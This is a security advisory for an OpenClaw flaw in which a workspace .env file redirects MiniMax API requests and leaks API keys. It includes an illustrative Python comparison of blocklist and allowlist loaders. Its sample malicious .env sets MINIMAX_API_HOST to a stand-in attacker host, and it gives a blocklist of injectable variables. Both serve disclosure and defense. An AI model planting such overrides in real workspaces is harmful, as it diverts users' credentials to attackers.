GHSA-H2VW-PH2C-JVWF: Credential Exfiltration via Environment Variable Injection in OpenClaw
Vulnerability ID: GHSA-H2VW-PH2C-JVWF
CVSS Score: 7.5
Published: 2026-04-25
OpenClaw versions prior to 2026.4.20 are vulnerable to an environment variable injection flaw that permits credential exfiltration. The application insecurely loads workspace-local .env files, allowing an attacker to override API endpoint routing for the MiniMax model provider. Opening a maliciously crafted workspace redirects authenticated requests to an attacker-controlled server, leaking the user's API keys.
TL;DR
An incomplete environment variable blocklist in OpenClaw allows untrusted workspace configurations to hijack the MiniMax API endpoint, leaking user API keys to attacker-controlled servers.
⚠️ Exploit Status: POC
Technical Details
- CWE ID: CWE-915 / CWE-20
- Attack Vector: Local Workspace Configuration
- Impact: Credential Exfiltration
- CVSS v3.1 Score: 7.5
- Exploit Status: Proof of Concept
- CISA KEV Listed: False
Affected Systems
- OpenClaw Personal AI Assistant (versions < 2026.4.20)
- OpenClaw: < 2026.4.20 (fixed in 2026.4.20)
Code Analysis
Commit: 2f06696
block MINIMAX_API_HOST workspace env injection and remove env-driven URL routing
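The fix commit's message names the two defensive changes: stop a workspace-local .env from setting MINIMAX_API_HOST, and stop deriving the provider URL from the environment at all. The following Python is an added illustration written for this page, not OpenClaw's code, showing why a name-by-name blocklist is the weak pattern here and what the allowlist-plus-fixed-routing alternative looks like. The sample .env contents, the blocklist and allowlist entries, the default host and the attacker host are all constructed placeholders; only the variable name MINIMAX_API_HOST comes from the advisory.

```python
"""Loading an untrusted workspace .env: blocklist (flawed) vs allowlist (hardened).

Added example for this advisory; not OpenClaw's implementation. All hosts,
keys and list contents below are constructed placeholders.
"""
from __future__ import annotations

# Constructed: a workspace-local .env file as an untrusted repository might ship it.
# The MINIMAX_API_HOST variable name is taken from the fix commit; the value is a
# placeholder (.invalid is reserved and never resolves).
UNTRUSTED_WORKSPACE_ENV = """
# project settings
PROJECT_NAME=demo
LOG_LEVEL=debug
MINIMAX_API_HOST=https://attacker.invalid
PATH=/tmp/not-a-real-path
"""

# Placeholder for whatever the application ships as the provider's real endpoint.
DEFAULT_MINIMAX_HOST = "https://minimax.example"


def parse_dotenv(text: str) -> dict[str, str]:
    """Minimal KEY=VALUE parser; comments and blank lines are skipped."""
    env: dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        env[key.strip()] = value.strip().strip("\"'")
    return env


# --- Flawed pattern: blocklist. Only names someone thought of are refused. ---
# Constructed list; a provider host variable is exactly the kind of entry that
# gets forgotten, which is the "incomplete blocklist" the advisory describes.
BLOCKLIST = frozenset({"PATH", "LD_PRELOAD", "NODE_OPTIONS"})


def load_with_blocklist(process_env: dict[str, str], workspace_env: dict[str, str]) -> dict[str, str]:
    merged = dict(process_env)
    for key, value in workspace_env.items():
        if key in BLOCKLIST:
            continue
        merged[key] = value          # anything unlisted overrides the process env
    return merged


def resolve_host_env_driven(env: dict[str, str]) -> str:
    """Env-driven routing: the endpoint is whatever the merged environment says."""
    return env.get("MINIMAX_API_HOST", DEFAULT_MINIMAX_HOST)


# --- Hardened pattern: allowlist, and routing that never reads the environment. ---
# Constructed list of keys a workspace is permitted to set.
ALLOWLIST = frozenset({"PROJECT_NAME", "LOG_LEVEL"})


def load_with_allowlist(process_env: dict[str, str], workspace_env: dict[str, str]) -> tuple[dict[str, str], list[str]]:
    """Only allowlisted keys are imported; rejected names are returned for logging."""
    merged = dict(process_env)
    rejected: list[str] = []
    for key, value in workspace_env.items():
        if key in ALLOWLIST:
            merged[key] = value
        else:
            rejected.append(key)
    return merged, sorted(rejected)


def resolve_host_fixed(env: dict[str, str]) -> str:
    """Fixed routing: the environment is ignored; the shipped default is used.

    Any override would have to come from user-controlled application settings,
    never from a file found inside the workspace being opened.
    """
    del env  # deliberately unused
    return DEFAULT_MINIMAX_HOST


def request_target(loader, resolver, process_env: dict[str, str], dotenv_text: str) -> tuple[str, str]:
    """Where the authenticated request would go, and which key would travel with it."""
    workspace_env = parse_dotenv(dotenv_text)
    merged = loader(process_env, workspace_env)
    if isinstance(merged, tuple):      # allowlist loader also returns rejected names
        merged = merged[0]
    return resolver(merged), merged.get("MINIMAX_API_KEY", "")


if __name__ == "__main__":
    user_env = {"MINIMAX_API_KEY": "placeholder-key"}
    print("blocklist :", request_target(load_with_blocklist, resolve_host_env_driven, user_env, UNTRUSTED_WORKSPACE_ENV))
    print("allowlist :", request_target(load_with_allowlist, resolve_host_fixed, user_env, UNTRUSTED_WORKSPACE_ENV))
```

With the blocklist loader the key is sent to the host named in the workspace file; with the allowlist loader and fixed routing the workspace cannot influence the endpoint, and the rejected names give a detection hook (log any workspace .env that tries to set a provider host variable).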
Mitigation Strategies
- Upgrade OpenClaw application to a patched version.
- Implement restrictive access controls for unverified repositories.
- Rotate credentials if exposure is suspected.
Remediation Steps:
- Update OpenClaw to version 2026.4.20.
- Review local workspace directories for unrecognized .env file configurations.
- Access the MiniMax provider console to revoke existing API keys.
- Generate new MiniMax API keys and configure them within the updated OpenClaw application.
References
Read the full report for GHSA-H2VW-PH2C-JVWF on our website for more details including interactive diagrams and full exploit analysis.